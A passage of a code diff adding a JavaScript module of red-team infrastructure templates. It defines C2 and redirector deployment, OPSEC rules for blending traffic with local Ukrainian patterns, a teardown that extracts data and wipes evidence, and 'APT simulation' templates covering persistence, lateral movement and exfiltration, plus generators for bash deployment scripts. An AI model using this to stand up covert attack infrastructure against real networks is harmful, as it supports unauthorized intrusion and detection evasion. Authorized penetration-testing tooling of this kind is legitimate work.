+            phase: 'preparation',
+            action: 'Assess network stability in region',
+            commands: ['./network-assessment.sh', './power-stability-check.sh'],
+            verification: 'Network paths identified, backup routes planned',
+            rollback: 'Adjust deployment region',
+            timeEstimate: '1 day',
+        },
+        {
+            order: 2,
+            phase: 'provisioning',
+            action: 'Deploy infrastructure',
+            commands: ['terraform apply -var-file=ukraine.tfvars'],
+            verification: 'All instances accessible',
+            rollback: 'terraform destroy',
+            timeEstimate: '2 hours',
+        },
+        {
+            order: 3,
+            phase: 'configuration',
+            action: 'Configure C2 and redirectors',
+            commands: ['ansible-playbook ukraine-deploy.yml'],
+            verification: 'End-to-end connectivity test passes',
+            rollback: 'Revert configuration',
+            timeEstimate: '3 hours',
+        },
+        {
+            order: 4,
+            phase: 'testing',
+            action: 'Test under degraded conditions',
+            commands: ['./degraded-network-test.sh', './failover-test.sh'],
+            verification: 'System resilient to network issues',
+            rollback: 'Enhance redundancy',
+            timeEstimate: '2 hours',
+        },
+        {
+            order: 5,
+            phase: 'activation',
+            action: 'Activate with satellite backup',
+            commands: ['./activate-primary.sh', './activate-sat-backup.sh'],
+            verification: 'Primary and backup channels operational',
+            rollback: 'Use backup only mode',
+            timeEstimate: '1 hour',
+        },
+    ],
+    opsecChecklist: [
+        {
+            category: 'network',
+            requirement: 'Account for network instability',
+            implementation: 'Multiple redundant paths, satellite backup',
+            verification: 'Regular failover testing',
+            priority: 'critical',
+        },
+        {
+            category: 'network',
+            requirement: 'Traffic should blend with local patterns',
+            implementation: 'Ukrainian language, local business hours, local domains',
+            verification: 'Traffic analysis shows realistic patterns',
+            priority: 'high',
+        },
+        {
+            category: 'physical',
+            requirement: 'Power resilience for any physical assets',
+            implementation: 'UPS, generator backup',
+            verification: 'Tested failover on power loss',
+            priority: 'high',
+        },
+        {
+            category: 'communication',
+            requirement: 'Secure backup comms',
+            implementation: 'Satellite phone, encrypted radio',
+            verification: 'Regular comms check',
+            priority: 'critical',
+        },
+    ],
+    teardownProcedure: [
+        {
+            order: 1,
+            action: 'Secure data extraction',
+            commands: ['./secure-extract.sh'],
+            verification: 'All data transferred via encrypted channel',
+            dataHandling: 'transfer',
+        },
+        {
+            order: 2,
+            action: 'Cryptographic wipe',
+            commands: ['./secure-wipe-all.sh'],
+            verification: 'Wipe verification complete',
+            dataHandling: 'wipe',
+        },
+        {
+            order: 3,
+            action: 'Destroy infrastructure',
+            commands: ['terraform destroy -auto-approve'],
+            verification: 'All resources terminated',
+            dataHandling: 'wipe',
+        },
+    ],
+    costEstimate: {
+        infrastructure: 400,
+        domains: 80,
+        monthly: 280,
+        setup: 150,
+        currency: 'USD',
+    },
+};
+export const AUTO_EXECUTION_TEMPLATES = [
+    {
+        id: 'us-full-pentest',
+        name: 'US Full Penetration Test',
+        description: 'Complete penetration test using US infrastructure',
+        region: 'us',
+        objectives: [
+            'Reconnaissance and enumeration',
+            'Initial access via phishing or exploit',
+            'Privilege escalation',
+            'Lateral movement',
+            'Data exfiltration demonstration',
+        ],
+        techniques: [
+            'dns_enum', 'subdomain_enum', 'port_scan', 'service_enum',
+            'web_fingerprint', 'vuln_scan', 'dir_enum',
+            'exploit_attempt', 'privesc', 'lateral_move', 'persistence',
+        ],
+        deliverableType: 'pentest-report',
+        estimatedDuration: '4-8 hours',
+        executionSteps: [
+            'Deploy US infrastructure stack',
+            'Execute reconnaissance phase',
+            'Identify and exploit vulnerabilities',
+            'Establish persistence',
+            'Demonstrate lateral movement',
+            'Document all findings',
+            'Generate penetration test report',
+        ],
+    },
+    {
+        id: 'us-apt-simulation',
+        name: 'US APT Simulation',
+        description: 'Advanced persistent threat simulation with full kill chain',
+        region: 'us',
+        objectives: [
+            'Simulate nation-state level adversary',
+            'Complete kill chain execution',
+            'Long-term persistence establishment',
+            'Stealth-focused operations',
+        ],
+        techniques: [
+            'dns_enum', 'subdomain_enum', 'service_enum',
+            'web_fingerprint', 'vuln_scan',
+            'exploit_attempt', 'privesc', 'persistence',
+            'lateral_move', 'exfil',
+        ],
+        deliverableType: 'apt-analysis',
+        estimatedDuration: '2-4 weeks',
+        executionSteps: [
+            'Deploy covert infrastructure',
+            'Conduct low-and-slow reconnaissance',
+            'Establish initial foothold',
+            'Deploy multiple persistence mechanisms',
+            'Map internal network',
+            'Identify and access crown jewels',
+            'Demonstrate exfiltration capability',
+            'Generate APT analysis report',
+        ],
+    },
+    {
+        id: 'ua-infrastructure-assessment',
+        name: 'Ukraine Infrastructure Assessment',
+        description: 'Security assessment of Ukrainian infrastructure',
+        region: 'ukraine',
+        objectives: [
+            'Assess network security posture',
+            'Identify critical vulnerabilities',
+            'Test resilience to nation-state attacks',
+            'Document defense recommendations',
+        ],
+        techniques: [
+            'dns_enum', 'port_scan', 'service_enum',
+            'vuln_scan', 'web_fingerprint',
+        ],
+        deliverableType: 'infrastructure-assessment',
+        estimatedDuration: '2-4 hours',
+        executionSteps: [
+            'Deploy Ukraine infrastructure',
+            'Conduct external reconnaissance',
+            'Identify exposed services',
+            'Assess vulnerability exposure',
+            'Test defense mechanisms',
+            'Generate infrastructure assessment',
+        ],
+    },
+    {
+        id: 'ua-resilience-test',
+        name: 'Ukraine Network Resilience Test',
+        description: 'Test network resilience under degraded conditions',
+        region: 'ukraine',
+        objectives: [
+            'Test operation under network instability',
+            'Verify backup channels',
+            'Assess satellite backup functionality',
+        ],
+        techniques: [
+            'dns_enum', 'port_scan', 'service_enum',
+        ],
+        deliverableType: 'vulnerability-report',
+        estimatedDuration: '4-6 hours',
+        executionSteps: [
+            'Deploy with primary and backup channels',
+            'Conduct operations on primary',
+            'Simulate network degradation',
+            'Verify failover to backup',
+            'Test satellite backup channel',
+            'Document resilience findings',
+        ],
+    },
+];
+// ═══════════════════════════════════════════════════════════════════════════════
+// FACTORY FUNCTIONS
+// ═══════════════════════════════════════════════════════════════════════════════
+export function getInfrastructureStack(region) {
+    switch (region) {
+        case 'us':
+            return US_INFRASTRUCTURE_STACK;
+        case 'ukraine':
+            return UKRAINE_INFRASTRUCTURE_STACK;
+        default:
+            return undefined;
+    }
+}
+export function getAutoExecutionTemplate(templateId) {
+    return AUTO_EXECUTION_TEMPLATES.find(t => t.id === templateId);
+}
+export function listTemplatesForRegion(region) {
+    return AUTO_EXECUTION_TEMPLATES.filter(t => t.region === region);
+}
+export function generateDeploymentScript(stack) {
+    let script = `#!/bin/bash
+# Auto-generated deployment script for ${stack.name}
+# Region: ${stack.region}
+# Classification: ${stack.classification}
+
+set -e
+
+echo "=== Deploying ${stack.name} ==="
+echo "Region: ${stack.region}"
+echo ""
+
+`;
+    for (const step of stack.deploymentProcedure) {
+        script += `# Step ${step.order}: ${step.action}\n`;
+        script += `echo "Phase: ${step.phase} - ${step.action}"\n`;
+        for (const cmd of step.commands) {
+            if (!cmd.startsWith('#')) {
+                script += `${cmd}\n`;
+            }
+        }
+        script += `echo "Verification: ${step.verification}"\n`;
+        script += `\n`;
+    }
+    script += `echo "=== Deployment Complete ==="\n`;
+    return script;
+}
+export function generateTeardownScript(stack) {
+    let script = `#!/bin/bash
+# Auto-generated teardown script for ${stack.name}
+# CAUTION: This will destroy all infrastructure
+
+set -e
+
+echo "=== Tearing down ${stack.name} ==="
+read -p "Are you sure? (yes/no): " confirm
+[[ "$confirm" != "yes" ]] && exit 1
+
+`;
+    for (const step of stack.teardownProcedure) {
+        script += `# Step ${step.order}: ${step.action}\n`;
+        script += `echo "Executing: ${step.action}"\n`;
+        for (const cmd of step.commands) {
+            script += `${cmd}\n`;
+        }
+        script += `echo "Data handling: ${step.dataHandling}"\n`;
+        script += `\n`;
+    }
+    script += `echo "=== Teardown Complete ==="\n`;
+    return script;
+}
+export function generateOpsecChecklist(stack) {
+    let checklist = `# OPSEC Checklist: ${stack.name}\n\n`;
+    const categories = new Set(stack.opsecChecklist.map(i => i.category));
+    for (const category of categories) {
+        checklist += `## ${category.toUpperCase()}\n\n`;
+        const items = stack.opsecChecklist.filter(i => i.category === category);
+        for (const item of items) {
+            const priority = item.priority === 'critical' ? '🔴' : item.priority === 'high' ? '🟠' : '🟡';
+            checklist += `- [ ] ${priority} **${item.requirement}**\n`;
+            checklist += `  - Implementation: ${item.implementation}\n`;
+            checklist += `  - Verification: ${item.verification}\n\n`;
+        }
+    }
+    return checklist;
+}
+//# sourceMappingURL=infrastructureTemplates.js.map